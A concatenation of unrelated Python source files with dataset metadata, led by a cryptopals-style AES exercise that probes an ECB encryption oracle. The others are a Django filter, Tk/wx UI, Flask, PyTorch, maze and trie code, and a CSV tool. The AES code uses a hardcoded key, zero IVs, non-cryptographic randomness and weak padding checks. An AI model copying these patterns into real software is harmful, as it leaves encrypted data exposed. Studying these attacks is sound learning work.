currentMessage += msg_bytes\n return currentMessage \n #print(b\">>> message >>>\",currentMessage) \n \n \ndef findKeysize(oracle, maxKeysize=32):\n keysize = 0\n payload = b\"\"\n previous_cipher = b\"\"\n for n in range(128):\n current_cipher = oracle(b\"\\x41\"*n)\n if (previous_cipher[:n-1] == current_cipher[:n-1]) and n>2:\n keysize = n-1 \n break\n previous_cipher = current_cipher\n return keysize\n\n\ndef oracle(msg_bytes):\n secret_bytes = b64.b64decode(\"Um9sbGluJyBpbiBteSA1LjAKV2l0aCBteSByYWctdG\\\n 9wIGRvd24gc28gbXkgaGFpciBjYW4gYmxvdwpUaGUgZ2lybGllcyBvbiBzdGFuZGJ5IHdhdm\\\n luZyBqdXN0IHRvIHNheSBoaQpEaWQgeW91IHN0b3A/IE5vLCBJIGp1c3QgZHJvdmUgYnkK\")\n \n msg_bytes += secret_bytes\n return aes_ecb_encrypt(msg_bytes, b\"very\\nsecret\\nkey!\")\n \n\ndef randModeEncrypt(msg_bytes, key_bytes):\n extended_msg_bytes = pkcs7padding(addBytes(msg_bytes)) \n \n r = random.randint(0,1)\n cipher_bytes = b\"\" \n if r:\n print(\">>> ecb mode\")\n cipher_bytes = aes_ecb_encrypt(extended_msg_bytes, key_bytes)\n else:\n print(\">>> cbc mode\")\n cipher_bytes = aes_cbc_encrypt(extended_msg_bytes, key_bytes, randomKey())\n return cipher_bytes\n \n \ndef addBytes(msg_bytes):\n n = random.randint(5,10)\n extended_msg_bytes = b\"\\x41\"*n + msg_bytes + b\"\\x41\"*n\n return extended_msg_bytes\n\n\ndef randomKey(keysize=16):\n key = [0] * keysize\n for i in range(keysize):\n key[i] = random.randint(0,255)\n return bytes(key)\n\n\ndef aes_ecb_encrypt(msg_bytes, key_bytes):\n aes_ecb = Crypto.Cipher.AES.new(key_bytes,Crypto.Cipher.AES.MODE_ECB)\n return aes_ecb.encrypt(pkcs7padding(msg_bytes))\n #return aes_ecb.encrypt((msg_bytes))\n \n \ndef aes_ecb_decrypt(cipher_bytes, key_bytes):\n aes_ecb = Crypto.Cipher.AES.new(key_bytes, Crypto.Cipher.AES.MODE_ECB)\n msg_bytes = aes_ecb.decrypt(cipher_bytes)\n # begin # remove padding\n print(\">>> remove padding\")\n n = msg_bytes[-1]\n print(\">>> \",n)\n if n <= 15: \n # end # remove padding\n return msg_bytes[:-n]\n else:\n return msg_bytes \n \ndef aes_cbc_decrypt(cipher_bytes,key_bytes=b\"YELLOW SUBMARINE\",iv_bytes=b\"\\x00\"*16):\n msg_bytes = []\n blocks = getBlocks(cipher_bytes)\n block_cipher_bytes = iv_bytes\n for block in blocks:\n xcipher_bytes = aes_ecb_decrypt(block, key_bytes)\n block_msg_bytes = caty.XOR(xcipher_bytes,block_cipher_bytes)\n msg_bytes.append(block_msg_bytes)\n block_cipher_bytes = block\n # begin # remove padding\n print(\">>> remove padding\")\n print(\">>> \", int(msg_bytes[-1],16))\n if int(msg_bytes[-1],16) <= 15:\n for i in range(int(msg_bytes[-1],16)):\n msg_bytes.pop() \n \n # end # remove padding\n return msg_bytes\n\n\ndef aes_cbc_encrypt(msg_bytes,key_bytes=b\"YELLOW SUBMARINE\",iv_bytes=b\"\\x00\"*16):\n padded_msg_bytes = msg_bytes #pkcs7padding(msg_bytes)\n #print(\">>\",padded_msg_bytes)\n cipher_bytes = []\n blocks = getBlocks(padded_msg_bytes)\n block_cipher_bytes = iv_bytes\n for block in blocks:\n # xor block with iv (or previous encrypted block) \n # encrypt xor'd block\n # use this xor'd block as iv for next cbc encryption \n xmsg_bytes = caty.XOR(block,block_cipher_bytes)\n block_cipher_bytes = aes_ecb_encrypt(xmsg_bytes, key_bytes)\n cipher_bytes.append(block_cipher_bytes)\n return cipher_bytes\n\n\ndef pkcs7padding(cipher_bytes,keysize=16):\n r = (keysize - (len(cipher_bytes) % keysize)) % keysize\n #print(r) \n padding = [r]*r\n paddedBytes = cipher_bytes + bytes(padding) \n return paddedBytes\n\n\ndef readCiphersFromFile(filename):\n ciphers = [] \n with open(filename, 'r') as cin:\n line = cin.readline()\n while line != \"\":\n ciphers.append(bytes.fromhex(line.rstrip()))\n line = cin.readline() \n return ciphers\n\n\ndef isECBmode(cipher_bytes,keysize=16):\n isECB = False\n cipherLength = len(cipher_bytes)\n blocks = getBlocks(cipher_bytes,keysize)\n if countRepetitiveBlocks(blocks) > 1:\n isECB = True \n return isECB\n\n\ndef countRepetitiveBlocks(blocks):\n maxCount = 0 \n for block in blocks:\n if blocks.count(block) > maxCount:\n maxCount = blocks.count(block)\n #print(blocks.count(block), maxCount)\n return maxCount\n\n\ndef getBlocks(cipher_bytes, keysize=16):\n blocks = [] \n cipherLength = len(cipher_bytes)\n nblocks = cipherLength // keysize \n \n for i in range(nblocks):\n blocks.append(cipher_bytes[i*keysize:(i+1)*keysize])\n #print(blocks)\n return blocks\n\n\ndef profile_for(adress):\n adress = adress.replace('&','').replace('=','')\n profile = \"email={email}&uid={uid}&role=user\".format(uid=10,email=adress)\n #print(\">>> profile >>>\\n\",profile)\n parse_request_string(profile) \n return profile\n\n\ndef parse_request_string(request_string):\n parameters = request_string.split('&')\n result = \"{\\n\" \n for p in parameters:\n pair = p.split('=')\n result += pair[0] + ': \\'' + pair[1] + '\\',\\n'\n result += \"}\\n\"\n #print(\">>> parsed string >>>\\n\",result)\n return result\n \nif __name__ == \"__main__\":\n main()","sub_path":"aes.py","file_name":"aes.py","file_ext":"py","file_size_in_byte":8935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"473238045","text":"from django.conf import settings\nfrom mediagenerator.generators.bundles.base import Filter\nfrom mediagenerator.utils import media_url\nimport logging\nimport re\n\nurl_re = re.compile(r'url\\s*\\([\"\\']?([\\w\\.][^:]*?)[\"\\']?\\)', re.UNICODE)\n\nREWRITE_CSS_MEDIA_URLS = getattr(settings, 'REWRITE_CSS_MEDIA_URLS', True)\n\nclass CSSURL(Filter):\n def __init__(self, **kwargs):\n super(CSSURL, self).__init__(**kwargs)\n assert self.filetype == 'css', (\n 'CSSURL only supports CSS output. '\n 'The parent filter expects \"%s\".' % self.filetype)\n\n def get_output(self, variation):\n for input in self.get_input(variation):\n yield self.rewrite_urls(input)\n\n def get_dev_output(self, name, variation):\n content = super(CSSURL, self).get_dev_output(name, variation)\n return self.rewrite_urls(content)\n\n def rewrite_urls(self, content):\n if not REWRITE_CSS_MEDIA_URLS:\n return content\n return url_re.sub(self.fixurls, content)\n\n def fixurls(self, match):\n url = match.group(1)\n if ':' not in url and not url.startswith('/'):\n try:\n url = media_url(url)\n except:\n logging.error('URL not found: %s' % url)\n return 'url(%s)' % url\n","sub_path":"mediagenerator/filters/cssurl.py","file_name":"cssurl.py","file_ext":"py","file_size_in_byte":1284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"581191969","text":"#------------------------------------------------------------------------------\n# Copyright (c) 2005, Enthought, Inc.\n# All rights reserved.\n# \n# This software is provided without warranty under the terms of the BSD\n# license included in enthought/LICENSE.txt and may be redistributed only\n# under the conditions described in the aforementioned license. The license\n# is also available online at http://www.enthought.com/licenses/BSD.txt\n# Thanks for using Enthought open source!\n# \n# Author: David C. Morrill\n# Date: 12/02/2004\n# Description: Create a 'live update' Tkinter user interface for a specified UI\n# object.\n#\n# Symbols defined: ui_live\n#\n#------------------------------------------------------------------------------\n\n#-------------------------------------------------------------------------------\n# Imports:\n#-------------------------------------------------------------------------------\n\nimport tk\n\nfrom ui_panel import panel, show_help\nfrom constants import screen_dy, scrollbar_dx\nfrom enthought.traits.ui.undo import UndoHistory\n\n#-------------------------------------------------------------------------------\n# Creates a 'live update' Tkinter user interface for a specified UI object:\n#-------------------------------------------------------------------------------\n\ndef ui_live ( ui, parent ):\n ui.control = LiveWindow( ui, parent )\n try:\n ui.prepare_ui()\n except:\n ui.control.Destroy()\n ui.control.ui = None\n ui.control = None\n ui.result = False\n raise\n ui.handler.position( ui.info )\n ui.control.Show()\n \n#-------------------------------------------------------------------------------\n# 'LiveWindow' class:\n#-------------------------------------------------------------------------------\n \nclass LiveWindow ( wx.Dialog ):\n \n #---------------------------------------------------------------------------\n # Initializes the object:\n #---------------------------------------------------------------------------\n \n def __init__ ( self, ui, parent ):\n wx.Dialog.__init__( self, parent, -1, ui.view.title )\n wx.EVT_CLOSE( self, self._on_close_page )\n wx.EVT_CHAR( self, self._on_key )\n \n history = None\n self.ui = ui\n view = ui.view\n if view.undo or view.revert or view.ok:\n ui.history = history = UndoHistory()\n \n # Create the actual trait sheet panel and imbed it in a scrollable \n # window:\n sizer = wx.BoxSizer( wx.VERTICAL )\n sw = wx.ScrolledWindow( self )\n trait_sheet = panel( ui, sw )\n sizer.Add( trait_sheet, 1, wx.EXPAND | wx.ALL, 4 )\n tsdx, tsdy = trait_sheet.GetSizeTuple()\n tsdx += 8\n tsdy += 8\n \n max_dy = (2 * screen_dy) / 3\n sw.SetAutoLayout( True )\n sw.SetSizer( sizer )\n sw.SetSize( wx.Size( tsdx + ((tsdy > max_dy) * scrollbar_dx), \n min( tsdy, max_dy ) ) )\n sw.SetScrollRate( 16, 16 )\n \n sw_sizer = wx.BoxSizer( wx.VERTICAL )\n sw_sizer.Add( sw, 1, wx.EXPAND )\n \n # Check to see if we need to add any of the special function buttons:\n if (history is not None) or view.help:\n sw_sizer.Add( wx.StaticLine( self, -1 ), 0, wx.EXPAND )\n b_sizer = wx.BoxSizer( wx.HORIZONTAL )\n if view.undo:\n self.undo = self._add_button( 'Undo', self._on_undo, b_sizer, \n False )\n self.redo = self._add_button( 'Redo', self._on_redo, b_sizer, \n False )\n history.on_trait_change( self._on_undoable, 'undoable',\n dispatch = 'ui' )\n history.on_trait_change( self._on_redoable, 'redoable',\n dispatch = 'ui' )\n if view.revert:\n self.revert = self._add_button( 'Revert', self._on_revert, \n b_sizer, False )\n history.on_trait_change( self._on_revertable, 'undoable',\n dispatch = 'ui' )\n if view.ok:\n self._add_button( 'OK', self._on_close_page, b_sizer )\n self._add_button( 'Cancel', self._on_cancel, b_sizer )\n if view.help:\n self._add_button( 'Help', self._on_help, b_sizer )\n sw_sizer.Add( b_sizer, 0, wx.ALIGN_RIGHT | wx.ALL, 5 )\n \n # Lay all of the dialog contents out: \n sw_sizer.Fit( self )\n self.SetSizer( sw_sizer )\n self.SetAutoLayout( True )\n\n #---------------------------------------------------------------------------\n # Closes the window (if allowed by the handler):\n #---------------------------------------------------------------------------\n \n def _on_close_page ( self, event = None ):\n \"\"\" Closes the window (if allowed by the handler).\n \"\"\"\n if self.ui.handler.close( self.ui.info, True ):\n self._close_page()\n\n #---------------------------------------------------------------------------\n # Closes the dialog window:\n #---------------------------------------------------------------------------\n \n def _close_page ( self ): \n \"\"\" Closes the dialog window.\n \"\"\"\n self.ui.control = None\n self.ui.result = True\n self.ui = None\n self.Destroy()\n \n #---------------------------------------------------------------------------\n # Handles the user hitting the 'Esc'ape key:\n #---------------------------------------------------------------------------\n \n def _on_key ( self, event ):\n \"\"\" Handles the user hitting the 'Esc'ape key.\n \"\"\"\n if event.GetKeyCode() == 0x1B:\n self._on_close_page( event )\n \n #---------------------------------------------------------------------------\n # Handles an 'Undo' change request:\n #---------------------------------------------------------------------------\n \n def _on_undo ( self, event ):\n \"\"\" Handles an 'Undo' change request.\n \"\"\"\n self.ui.history.undo()\n \n #---------------------------------------------------------------------------\n # Handles a 'Redo' change request:\n #---------------------------------------------------------------------------\n \n def _on_redo ( self, event ):\n \"\"\" Handles a 'Redo' change request.\n \"\"\"\n self.ui.history.redo()\n \n #---------------------------------------------------------------------------\n # Handles a 'Revert' all changes request:\n #---------------------------------------------------------------------------\n \n def _on_revert ( self, event ):\n \"\"\" Handles a 'Revert' all changes request.\n \"\"\"\n self.ui.history.revert()\n \n #---------------------------------------------------------------------------\n # Handles a 'Cancel' all changes request:\n #---------------------------------------------------------------------------\n \n def _on_cancel ( self, event ):\n \"\"\" Handles a 'Cancel' all changes request.\n \"\"\"\n if self.ui.handler.close( self.ui.info, True ):\n self._on_revert( event )\n self._close_page()\n \n #---------------------------------------------------------------------------\n # Handles the 'Help' button being clicked:\n #---------------------------------------------------------------------------\n \n def _on_help ( self, event ):\n \"\"\" Handles the 'Help' button being clicked.\n \"\"\"\n show_help( self.ui, event.GetEventObject() )\n \n #---------------------------------------------------------------------------\n # Handles the undo history 'undoable' state changing:\n #---------------------------------------------------------------------------\n \n def _on_undoable ( self, state ):\n \"\"\" Handles the undo history 'undoable' state changing.\n \"\"\"\n self.undo.Enable( state )\n \n #---------------------------------------------------------------------------\n # Handles the undo history 'redoable' state changing:\n #---------------------------------------------------------------------------\n \n def _on_redoable ( self, state ):\n \"\"\" Handles the undo history 'redoable' state changing.\n \"\"\"\n self.redo.Enable( state )\n \n #---------------------------------------------------------------------------\n # Handles the 'revert' state changing:\n #---------------------------------------------------------------------------\n \n def _on_revertable ( self, state ):\n \"\"\" Handles the 'revert' state changing.\n \"\"\"\n self.revert.Enable( state )\n\n #---------------------------------------------------------------------------\n # Creates a new dialog button:\n #---------------------------------------------------------------------------\n\n def _add_button ( self, label, action, sizer, enabled = True ):\n \"\"\" Creates a new dialog button.\n \"\"\"\n button = wx.Button( self, -1, label )\n wx.EVT_BUTTON( self, button.GetId(), action )\n sizer.Add( button, 0, wx.LEFT, 5 )\n button.Enable( enabled )\n return button\n \n","sub_path":"lib/enthought/traits/ui/tk/ui_nonmodal.py","file_name":"ui_nonmodal.py","file_ext":"py","file_size_in_byte":9579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"540342406","text":"from io import BytesIO\n\nimport streamlit as st\nfrom arc.arc import Index\nfrom arc.viz import plot\nfrom matplotlib import pyplot\nfrom matplotlib.figure import Figure\n\n\ndef cached_plot(\n plot_idx: Index, attribute: str | None = None, cache: bool = True\n) -> BytesIO:\n full_idx = (plot_idx, attribute)\n _arc = st.session_state.arc\n plot_cache = st.session_state.plot_cache\n if full_idx in plot_cache:\n return plot_cache[full_idx]\n\n image_buffer = BytesIO()\n if attribute is not None:\n fig: Figure = plot(getattr(_arc[plot_idx], attribute))\n else:\n fig: Figure = plot(_arc[plot_idx])\n fig.savefig(image_buffer, format=\"png\")\n pyplot.close(fig)\n if cache:\n plot_cache[full_idx] = image_buffer\n return image_buffer\n","sub_path":"arc/app/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"426682974","text":"#!/usr/bin/python3\n\nimport requests, json\n\nURL = 'http://127.0.0.1:5000/usuarios/'\n\nnome = input('Digite o nome: ')\nemail = input('Digite o e-mail: ')\n\nusuario = json.dumps({'nome':nome,'email':email})\nheader = {'Content-Type':'application/json'}\n\nrequest = requests.post(URL, data=usuario, headers=header)\n\nif request.status_code == 200:\n print(request.json())\nelse:\n print('Problemas com a requisicao')\n","sub_path":"api/post.py","file_name":"post.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"208097603","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /usr/local/anaconda3/lib/python3.6/site-packages/vnlp/nn/functional.py\n# Compiled at: 2018-06-21 18:29:18\n# Size of source mod 2**32: 1220 bytes\nimport torch, numpy as np\n\ndef pad(seqs, pad_value=0, device=None):\n \"\"\"\n pads a list of variable-lengthed lists and returns a padded tensor and a lengths tensor.\n \"\"\"\n lens = [len(s) for s in seqs]\n max_len = max(lens)\n return (torch.tensor([s + [pad_value] * (max_len - l) for s, l in zip(seqs, lens)], device=device), torch.tensor(lens, device=device))\n\n\ndef mask(lens, invert=False, device=None, total_length=None):\n \"\"\"\n return a boolean mask of valid positions corresponding to the given lengths.\n \"\"\"\n max_len = total_length if total_length else lens.max().item()\n valid = False if invert else True\n return torch.tensor([[valid] * l + [not valid] * (max_len - l) for l in lens.tolist()], device=device)\n\n\ndef mask_invalid_scores(scores, lens):\n \"\"\"\n returns a differentiable version of scores whose invalid positions are masked with `-np.inf`.\n \"\"\"\n valid = mask(lens, device=(scores.device), total_length=(scores.size(1)))\n while scores.dim() > valid.dim():\n valid = valid.unsqueeze(valid.dim()).expand_as(scores)\n\n neg = torch.zeros_like(valid, device=(scores.device)).float()\n neg.masked_fill_(1 - valid, -np.inf)\n return scores * valid.float() + neg","sub_path":"pycfiles/vnlp-0.0.1.macosx-10.7-x86_64.tar/functional.cpython-36.py","file_name":"functional.cpython-36.py","file_ext":"py","file_size_in_byte":1530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"165430139","text":"# 计算从1到10中 偶数的平方 列表推导式\n# 变量和作用域\naList = []\nfor index in range(1, 21):\n if index % 2 == 0:\n aList.append(index * index)\nprint(aList)\n\n# 列表推导式\nbList = [i * i for i in range(1, 21) if (i % 2) == 0]\n\nprint(bList)\n\nx = 100\nprint(x)\n\ndef foo():\n global x\n x = 500\n print(x)\n\n def bar():\n x = 300\n print(x)\n bar()\n print(x)\n\nif __name__ == '__main__':\n foo()\n","sub_path":"venv/mouth.py","file_name":"mouth.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"356390872","text":"\ndef write_answer(index, answer):\n print(\"Case #%s: %s\" % (index, answer))\n\n\ndef main():\n f = open(\"D-small-attempt1.in\")\n\n lines = f.readlines()\n case = lines[0].rstrip()\n\n for index in range(1, int(case) + 1):\n line = lines[index].rstrip()\n list_item = line.split()\n\n K = int(list_item[0])\n C = int(list_item[1])\n S = int(list_item[2])\n\n answer = ''\n for i in range(1, int(K) + 1):\n answer += str(i) + \" \"\n\n write_answer(index, answer)\n\n index += 1\n\n f.close()\n\n\nmain()\n","sub_path":"codes/CodeJamCrawler/CJ/16_0_4_caslte_2016-d.py","file_name":"16_0_4_caslte_2016-d.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"61415973","text":"#!/usr/bin/env python3\n\nimport random\nimport arcade\nimport timeit\nimport os\n\nNATIVE_SPRITE_SIZE = 128\nSPRITE_SCALING = 0.25\nSPRITE_SIZE = NATIVE_SPRITE_SIZE * SPRITE_SCALING\nSCREEN_WIDTH = 1000\nheight = 700\nSCREEN_TITLE = \"Maze Depth First Example\"\nMOVEMENT_SPEED = 8\nTILE_EMPTY = 0\nTILE_CRATE = 1\nMERGE_SPRITES = True\nVIEWPORT_MARGIN = 200\n\n\nclass Maze(arcade.SpriteList):\n def __init__(self, width, height):\n super().__init__()\n self.setup(width, height)\n\n def setup(self, width, height):\n # Create the maze\n maze = self.make_maze_depth_first(width, height)\n\n # Create sprites based on 2D grid\n if not MERGE_SPRITES:\n # This is the simple-to-understand method. Each grid location\n # is a sprite.\n for row in range(height):\n for column in range(width):\n if maze[row][column] == 1:\n wall = arcade.Sprite(\n \"local_resources/brick.png\", SPRITE_SCALING\n )\n wall.center_x = column * SPRITE_SIZE + SPRITE_SIZE / 2\n wall.center_y = row * SPRITE_SIZE + SPRITE_SIZE / 2\n self.append(wall)\n else:\n for row in range(height):\n column = 0\n while column < len(maze):\n while column < len(maze) and maze[row][column] == 0:\n column += 1\n start_column = column\n while column < len(maze) and maze[row][column] == 1:\n column += 1\n end_column = column - 1\n\n column_count = end_column - start_column + 1\n column_mid = (start_column + end_column) / 2\n\n wall = arcade.Sprite(\n \"local_resources/brick.png\",\n SPRITE_SCALING,\n repeat_count_x=column_count,\n )\n wall.center_x = column_mid * SPRITE_SIZE + SPRITE_SIZE / 2\n wall.center_y = row * SPRITE_SIZE + SPRITE_SIZE / 2\n wall.width = SPRITE_SIZE * column_count\n self.append(wall)\n\n def _create_grid_with_cells(self, width, height):\n \"\"\"Create a grid with empty cells on odd row/column combinations.\"\"\"\n grid = []\n for row in range(height):\n grid.append([])\n for column in range(width):\n if column % 2 == 1 and row % 2 == 1:\n grid[row].append(TILE_EMPTY)\n elif (\n column == 0 or row == 0 or column == width - 1 or row == height - 1\n ):\n grid[row].append(TILE_CRATE)\n else:\n grid[row].append(TILE_CRATE)\n grid[-2][-3] = TILE_EMPTY\n grid[1][0] = TILE_EMPTY\n return grid\n\n def make_maze_depth_first(self, maze_width, maze_height):\n maze = self._create_grid_with_cells(maze_width, maze_height)\n\n w = (len(maze[0]) - 1) // 2\n h = (len(maze) - 1) // 2\n vis = [[0] * w + [1] for _ in range(h)] + [[1] * (w + 1)]\n\n def walk(x: int, y: int):\n vis[y][x] = 1\n\n d = [(x - 1, y), (x, y + 1), (x + 1, y), (x, y - 1)]\n random.shuffle(d)\n for (xx, yy) in d:\n if vis[yy][xx]:\n continue\n if xx == x:\n maze[max(y, yy) * 2][x * 2 + 1] = TILE_EMPTY\n if yy == y:\n maze[y * 2 + 1][max(x, xx) * 2] = TILE_EMPTY\n\n walk(xx, yy)\n\n walk(random.randrange(w), random.randrange(h))\n\n return maze\n","sub_path":"GoblinKing/game/maze.py","file_name":"maze.py","file_ext":"py","file_size_in_byte":3754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"601797805","text":"\"\"\"\nAWS Lambda and API Gateway\n\"\"\"\nfrom os import environ\n\nimport awscli.clidriver\nimport boto3\nimport yaml\n\nfrom hip_edit import resource_title\n\n\ndef main(cli_options, build_context):\n \"\"\"\n Packages and deploys the AWS Lambda infrastructure\n \"\"\"\n prefix = cli_options.name\n template_path = cli_options.sam_template_path\n bucket_name = cli_options.sam_bucket_name\n driver = awscli.clidriver.create_clidriver()\n packaged_template_path = _package(prefix, template_path, bucket_name, driver)\n if packaged_template_path is None:\n return None\n _configure_lambda(packaged_template_path, build_context)\n if cli_options.dry_run is True:\n return None\n stack_name = \"%sSAMStack\" % prefix\n _deploy(stack_name, packaged_template_path, driver, cli_options.role_arn)\n return _collect_outputs(stack_name)\n\n\ndef _package(prefix, template_path, bucket_name, driver):\n packaged_path = resource_title.packaged_path(template_path)\n argv = 'cloudformation package'.split()\n argv.extend(\"--template {0}\".format(template_path).split())\n argv.extend(\"--output-template-file {0}\".format(packaged_path).split())\n argv.extend(\"--s3-bucket {0}\".format(bucket_name).split())\n argv.extend(\"--s3-prefix {0}\".format(resource_title.bucket_name(prefix)).split())\n if driver.main(args=argv) == 0:\n return packaged_path\n return None\n\n\ndef _deploy(stack_name, packaged_template_path, driver, role_arn=None):\n argv = 'cloudformation deploy'.split()\n argv.extend(\"--template-file {0}\".format(packaged_template_path).split())\n argv.extend(\"--stack-name {0}\".format(stack_name).split())\n argv.extend(\"--capabilities CAPABILITY_IAM\".split())\n if role_arn:\n argv.extend(\"--role-arn {0}\".format(role_arn).split())\n driver.main(args=argv)\n\n\ndef _configure_lambda(template_path, build_context):\n model = yaml.load(file(template_path, 'r'))\n lambda_functions = ['HipEditServerApiFunction', 'HipEditLambdaAuthorizerFunction']\n for function in lambda_functions:\n lambda_vars = model['Resources'][function]['Properties']['Environment']['Variables']\n for name in lambda_vars.keys():\n value = None\n if name in environ:\n value = environ[name]\n elif name in build_context.lambda_vars():\n if name == 'npm_config_messaging_password':\n key = environ['npm_config_messaging_user']\n value = build_context.get(key, group_key=('services', 'activemq', 'users'))\n elif name == 'npm_config_auth_agent_passcode':\n key = environ['npm_config_auth_agent_login']\n value = build_context.get(key, group_key=('services', 'activemq', 'users'))\n else:\n value = build_context.get(name)\n if value:\n lambda_vars[name] = value\n\n yaml.dump(model, stream=file(template_path, 'w'), default_flow_style=False)\n\n\ndef _collect_outputs(stack_name, cloudformation=boto3.resource('cloudformation')):\n return cloudformation.Stack(stack_name).outputs\n","sub_path":"hip-edit-infra/hip_edit/sam_deployer.py","file_name":"sam_deployer.py","file_ext":"py","file_size_in_byte":3115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"251857664","text":"from flask import Flask, render_template, redirect\nfrom post import Post\nimport requests\n\napp = Flask(__name__)\nr = requests.get(url='https://api.npoint.io/3a5c17a4a7337a29219f')\nr.raise_for_status()\njson_posts = r.json()\n\nall_posts = []\n\nfor p in json_posts['posts']:\n post_obj = Post(p['id'], p['title'], p['subtitle'], p['content'])\n all_posts.append(post_obj)\n print(all_posts)\n\n\n@app.route(\"/\")\ndef home():\n print(f\"from home() - {type(all_posts)}\")\n return render_template('index.html', blog_posts=all_posts)\n\n\n@app.route(\"/post/\")\ndef get_post(post_id):\n requested_post = None\n for i, pst in enumerate(all_posts):\n if pst.id == post_id:\n requested_post = pst\n if requested_post is not None:\n return render_template(\"post.html\", post=requested_post)\n else:\n return redirect(\"/\")\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","sub_path":"day57/jinja-magic/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"190173105","text":"class Node:\n \"\"\"\n Implementation of node for trie.\n \"\"\"\n def __init__(self):\n self.children = {}\n self.end_of_word = False\n\nclass Trie(object):\n \"\"\"\n This is an implementation of a trie.\n \"\"\"\n\n def __init__(self):\n self.root = Node()\n\n def __str__(self):\n \"\"\"Prints all of the starting nodes in trie.\"\"\"\n print(self.root.children)\n\n def insert(self,word):\n \"\"\"Inserts a word into trie.\"\"\"\n curr = self.root\n for char in word:\n node = curr.children.get(char,-1)\n if node == -1:\n node = Node()\n curr.children[char] = node\n curr = node\n curr.end_of_word = True\n\n def search(self,word):\n \"\"\"Checks to see if a word is in trie.\"\"\"\n curr = self.root\n for char in word:\n if char in curr.children:\n curr = curr.children[char]\n else:\n return False\n return curr.end_of_word == True\n\n def starts_with(self,prefix):\n \"\"\"Checks if a prefix is in the trie.\"\"\"\n curr = self.root\n for char in prefix:\n if char in curr.children:\n curr = curr.children[char]\n else:\n return False\n return True\n\n#This is intantiating an instance of a Trie class\n# trie = Trie()\n# trie.insert(\"cax\")\n# trie.__str__()\n# print(trie.starts_with(\"\"))\n# print(trie.search(\"cax\"))\n","sub_path":"data-structure-implementations/Trie/trie.py","file_name":"trie.py","file_ext":"py","file_size_in_byte":1459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"111213577","text":"import csv\nimport os\nfrom tkinter import filedialog, Tk\n\ndef which_directory():\n \"\"\"This function provides an easy GUI for the user to select the\n working directory of the files.\"\"\"\n # Ask for the directory to get the files from\n root = Tk().withdraw() # .withdraw() hides that second blank window\n # This sets to the users home directory\n init_dir = os.path.expanduser('~')\n # These options in .askdirectory seem to get the job done!\n filedirectory = filedialog.askdirectory(initialdir=init_dir,\n title='Please select a directory')\n return filedirectory\n\ndef makeNodes(anonymized):\n # Cleanup Family Finder Matches file and create nodes.csv\n for filename in os.listdir(file_directory):\n if 'Matches' in filename:\n with open(os.path.join(file_directory, filename), 'r', encoding=\"UTF8\") as ffile:\n # Create empty nodes list\n nodes = []\n readnodes = csv.reader(ffile)\n # Pump file contents into nodes list\n for row in readnodes:\n nodes.append(row)\n # Read the column names from the first line of the file\n nodeHeader = nodes[0]\n # Fix ID column header\n if nodeHeader[11] == \"ResultID2\":\n nodeHeader[11] = nodeHeader[11].replace(\"ResultID2\", \"ID\")\n print(\"Fixed ID Header\")\n else:\n print(\"ID Header OK\")\n # Fix Label column header\n if nodeHeader[13] == \"Name\":\n nodeHeader[13] = nodeHeader[13].replace(\"Name\", \"Label\")\n print(\"Fixed Label Header\")\n else:\n print(\"Label Header OK\")\n # Pop off first row (the headers)\n nodes.pop(0)\n # Now we have Headers and nodes objects\n # Figure out working directory\n #workPath = os.path(file_directory)\n if anonymized == \"y\":\n nodeFile = str(file_directory + '/nodesAnonymized.csv')\n else:\n nodeFile = str(file_directory + '/nodes.csv')\n #print(\"DEBUG- \", nodeFile)\n # If nodes.csv exists, delete it\n if os.path.isfile(nodeFile):\n try:\n os.unlink(nodeFile)\n print(\"Removed previous nodes.csv file.\")\n except:\n print(\"No previous nodes.csv file found.\")\n # Generate file based on Anonymized data or not\n if anonymized == \"y\":\n # Write the Header and nodes to file\n with open(nodeFile, 'w', encoding=\"UTF8\", newline='') as outfile:\n writenodes = csv.writer(outfile)\n writenodes.writerow([nodeHeader[1], nodeHeader[2], nodeHeader[3], nodeHeader[4],\n nodeHeader[5], nodeHeader[6], nodeHeader[8], nodeHeader[9],\n nodeHeader[10], nodeHeader[11], nodeHeader[12],\n nodeHeader[13]])\n for row in nodes:\n writenodes.writerow([row[1], row[2], row[3], row[4],\n row[5], row[6], row[8], row[9],\n row[10], row[11], row[12], row[11]])\n else:\n with open(nodeFile, 'w', encoding=\"UTF8\", newline='') as outfile:\n writenodes = csv.writer(outfile)\n writenodes.writerow([nodeHeader[0], nodeHeader[1], nodeHeader[2], nodeHeader[3],\n nodeHeader[4], nodeHeader[5], nodeHeader[6], nodeHeader[7],\n nodeHeader[8], nodeHeader[9], nodeHeader[10],\n nodeHeader[11], nodeHeader[12], nodeHeader[13]])\n for row in nodes:\n writenodes.writerow([row[0], row[1], row[2], row[3], row[4],\n row[5], row[6], row[7], row[8], row[9],\n row[10], row[11], row[12], row[13]])\n print(\"Created nodes.csv file\")\n\ndef makeEdges():\n # Cleanup ICW file and create edges.csv\n for filename in os.listdir(file_directory):\n if 'ICW' in filename:\n with open(os.path.join(file_directory, filename), 'r', encoding=\"UTF8\") as ffile:\n # 